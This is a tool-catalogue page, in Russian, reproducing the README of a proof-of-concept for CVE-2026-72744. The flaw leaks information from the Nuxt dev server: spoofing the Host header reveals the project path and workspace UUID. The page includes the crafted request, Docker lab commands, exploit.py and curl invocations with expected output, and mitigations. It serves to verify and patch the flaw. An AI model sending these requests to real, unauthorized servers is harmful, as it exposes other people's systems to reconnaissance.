Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
Инструменты/GitHubGitHub/saku0512/cve-2026-72744-poc
Анализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийСтатьи и ИсследованияОбучение и Образование
GitHubsaku0512/cve-2026-72744-poc

CVE-2026-72744-poc

Доказательство концепции эксплуатации для CVE-2026-72744 — уязвимости раскрытия информации в конечной точке рабочей области Chrome DevTools dev-сервера Nuxt. Демонстрирует недостаток и проверяет исправление.

Репозиторий
5 ч 18 мин назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

CVE-2026-72744: PoC утечки информации через Chrome DevTools endpoint в Nuxt

English version

Обзор

Этот репозиторий содержит Proof of Concept (PoC) для уязвимости утечки информации CVE-2026-72744, существующей в Chrome DevTools workspace endpoint на сервере разработки Nuxt.

Уязвимый сервер разработки определяет, является ли подключение локальным, не по TCP peer address, а по HTTP-заголовкам, таким как Host, которые может задать атакующий. Если сервер разработки привязан к 0.0.0.0, неаутентифицированный атакующий в LAN может получить абсолютный путь проекта и постоянный workspace UUID с помощью запроса с заголовком Host: localhost.

Этот PoC запускает Nuxt 4.5.0 (уязвимая версия) и 4.5.1 (исправленная версия) в Docker и отправляет одинаковые запросы со стороны хоста для проверки различий в поведении. Чтение/запись файлов и выполнение кода не выполняются.

Отказ от ответственности

Используйте только в образовательных целях и для разрешённых проверок безопасности. Не отправляйте запросы в сторонние среды без разрешения.

Детали уязвимости

  • CVE ID: CVE-2026-72744
  • Продукт: Nuxt
  • Тип: утечка информации (CWE-200)
  • Затронутые версии: >= 4.4.7, < 4.5.1 и >= 3.21.7, < 3.21.10
  • Исправленные версии: 4.5.1 / 3.21.10
  • Объект: только сервер разработки (production build не затронут)
  • Необходимые условия: bind, доступный по сети, и включённый по умолчанию experimental.chromeDevtoolsProjectSettings
  • Воздействие: утечка абсолютного пути rootDir и специфичного для проекта workspace UUID

Корневая причина

В уязвимой версии isLocalDevRequest обрабатывает запрос как локальный, если Host находится в списке разрешённых и отсутствуют исходящие от браузера кросс-сайт заголовки. Не-браузерные клиенты могут свободно опускать или задавать эти заголовки, поэтому следующий запрос проходит проверку.

root@kitploit:~
GET /.well-known/appspecific/com.chrome.devtools.json HTTP/1.1
Host: localhost

Исправленная версия в дополнение к существующей проверке заголовков требует, чтобы фактический TCP peer address был loopback (127.0.0.0/8 или ::1).

Proof of Concept (инструкция по использованию)

1. Запуск окружения

root@kitploit:~
docker compose up -d --build
URLВерсияОжидаемый результат
http://localhost:3000Nuxt 4.5.0HTTP 200, утечка информации
http://localhost:3001Nuxt 4.5.1HTTP 403

При первой сборке может потребоваться несколько минут на получение npm-пакетов.

2. Проверка уязвимой версии

root@kitploit:~
python3 exploit.py -t http://localhost:3000 --expect vulnerable

Ожидаемый вывод:

root@kitploit:~
[!] VULNERABLE: the endpoint disclosed workspace.root and workspace.uuid.

3. Проверка исправленной версии

root@kitploit:~
python3 exploit.py -t http://localhost:3001 --expect fixed

Ожидаемый вывод:

root@kitploit:~
[+] FIXED: the non-loopback request was rejected with HTTP 403.

4. Проверка с помощью curl

root@kitploit:~
curl -i -H 'Host: localhost' \
  http://localhost:3000/.well-known/appspecific/com.chrome.devtools.json

curl -i -H 'Host: localhost' \
  http://localhost:3001/.well-known/appspecific/com.chrome.devtools.json

Поскольку запрос проходит через переадресацию портов Docker, с точки зрения контейнера источник подключения не является loopback. Это позволяет воспроизвести условия, эквивалентные атаке из LAN, на одном хосте.

5. Очистка

root@kitploit:~
docker compose down -v

Критерии определения уязвимости в PoC

exploit.py задаёт Host: localhost и обращается к целевому endpoint без отправки Origin, Referer и Sec-Fetch-Site. Уязвимость фиксируется только в том случае, если JSON с HTTP 200 содержит строки workspace.root и workspace.uuid. HTTP 403 — ожидаемое поведение для исправленной версии.

Меры противодействия

Обновите Nuxt до версии 4.5.1 или новее для 4.x и 3.21.10 или новее для 3.x. Если обновление невозможно, привяжите сервер разработки только к loopback или установите experimental.chromeDevtoolsProjectSettings: false.

Справочная информация

  • GitHub Security Advisory GHSA-7c4v-fwgw-9rf7
  • Nuxt 4.5.1 release
  • Fix commit
  • NVD: CVE-2026-72744
Скачать инструмент